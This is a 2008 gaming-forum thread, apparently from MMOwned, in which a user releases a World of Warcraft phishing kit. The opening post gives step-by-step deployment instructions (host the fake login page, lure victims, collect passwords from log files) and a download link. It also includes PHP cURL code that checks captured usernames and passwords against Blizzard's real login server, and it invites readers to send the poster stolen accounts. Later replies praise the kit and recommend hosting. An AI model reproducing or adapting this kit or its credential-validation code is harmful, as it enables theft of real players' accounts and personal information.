[Release] WoW Phisher w/ WORKING LOGIN CHECK menu

Shout-Out

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 18
  1. #1
    mjmorrell3's Avatar Member
    Reputation
    27
    Join Date
    Jan 2008
    Posts
    60
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [Release] WoW Phisher w/ WORKING LOGIN CHECK

    Hello MMowned, I had a request from someone to edit a WoW Phisher so that it actually checks for valid account information before writing it to a file and proceeding to collect more bullshit information.

    The script uses cURL and libCURL and requires that your PHP installation has both of these.

    NOTE: I did NOT code the original phisher. Also, after entering correct account info, it takes you to the second page which proceeds to ask you for the full account info.

    Steps:
    1. Find free webhosting with PHP and cURL
    2. Upload all files in the zip file to a directory.
    3. Send people to your fake login.
    4. Check log1.html and log2.html for the usernames and passwords they enter.

    Download:
    http://www.mediafire.com/?mdjjmz0mdix

    Enjoy!

    Also, if any of you guys gets an extra account, feel free to PM it to me

    EDIT: For all your PHP coders, heres the code to incoporate this into your phisher if you know what you are doing.
    $ch2 = curl_init();
    $useragent="Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3";
    curl_setopt ($ch2, CURLOPT_URL, "https://www.blizzard.com/login/login.xml?referer=https%3A%2F%2Fwww.worldofwarcraft.com%2Fcharcopy%2F&loginType= wow");
    curl_setopt($ch2, CURLOPT_USERAGENT, $useragent);
    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch2, CURLOPT_POST, 1);
    curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch2, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch2, CURLOPT_REFERER, "https://www.blizzard.com/login/login.xml?referer=https%3A%2F%2Fwww.worldofwarcraft.com%2Fcharcopy%2F&loginType= wow");
    curl_setopt($ch2, CURLOPT_POSTFIELDS, "accountName=" . $user . "&password=" . $pass);
    $source2 = curl_exec($ch2);
    curl_close($ch2);
    if (strpos($source2, 'Account Login') !== false) {

    //Account Login Failed
    //Code Here!

    } else {

    //Account Login Success!
    //Code Here!

    }
    Last edited by mjmorrell3; 11-09-2008 at 03:36 AM.

    [Release] WoW Phisher w/ WORKING LOGIN CHECK
  2. #2
    Nikentic's Avatar Elite User
    Reputation
    453
    Join Date
    Oct 2007
    Posts
    1,556
    Thanks G/R
    10/4
    Trade Feedback
    6 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    virus search? ^^

  3. #3
    mjmorrell3's Avatar Member
    Reputation
    27
    Join Date
    Jan 2008
    Posts
    60
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

  4. #4
    Arkeon's Avatar Member
    Reputation
    1
    Join Date
    Nov 2008
    Posts
    3
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Is this a virus?

  5. #5
    mjmorrell3's Avatar Member
    Reputation
    27
    Join Date
    Jan 2008
    Posts
    60
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    No. It is not a virus..

  6. #6
    tatortotts's Avatar Contributor
    Reputation
    93
    Join Date
    Jun 2007
    Posts
    263
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    He just gave a virus check -.-
    Anyways, +Rep
    I don't know how to use this, but good job, man.

    -Tator

  7. #7
    m3k0's Avatar Member
    Reputation
    17
    Join Date
    Sep 2006
    Posts
    116
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nice <3 +rep

  8. #8
    mjmorrell3's Avatar Member
    Reputation
    27
    Join Date
    Jan 2008
    Posts
    60
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I will post an updated version with the new phisher page when I can get it done!

  9. #9
    Shawrty's Avatar Member
    Reputation
    6
    Join Date
    Jan 2008
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nice Thats pretty sweet

  10. #10
    Trauts's Avatar Active Member
    Reputation
    52
    Join Date
    May 2007
    Posts
    185
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Awesome. You know, I was just thinking about whether it would be possible to do something like this after waking up and checking the logs to see 2 mbs of racial slurs.

  11. #11
    Functions's Avatar Banned
    Reputation
    10
    Join Date
    Dec 2007
    Posts
    206
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This is epic!

  12. #12
    Functions's Avatar Banned
    Reputation
    10
    Join Date
    Dec 2007
    Posts
    206
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Works very well, If you type in a non working account it wont go through for all u just skimming through the page. If its only real it works.

  13. #13
    poofterpantslol's Avatar Member
    Reputation
    11
    Join Date
    Oct 2008
    Posts
    26
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    +rep. now just hoping someone can find a good host for this

  14. #14
    Functions's Avatar Banned
    Reputation
    10
    Join Date
    Dec 2007
    Posts
    206
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    110mb Works

  15. #15
    ondskab10O's Avatar Member
    Reputation
    2
    Join Date
    Apr 2008
    Posts
    44
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i cant download it anymore?can u help me plz?

Page 1 of 2 12 LastLast

Similar Threads

  1. [RELEASE]Blizzlike WoW Phisher [R-TardSoft]
    By Dombo in forum WoW Scam Prevention
    Replies: 40
    Last Post: 04-13-2009, 11:44 AM
  2. [RELEASE] Trade Phisher (check it out, really)
    By Y R U A NUB ? in forum WoW Scam Prevention
    Replies: 16
    Last Post: 11-24-2007, 02:02 PM
  3. [RELEASE] My redone WoW phisher - Only 3 Files to Upload!
    By gamefreakfatty in forum WoW Scam Prevention
    Replies: 37
    Last Post: 10-09-2007, 04:58 PM
All times are GMT -5. The time now is 08:05 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search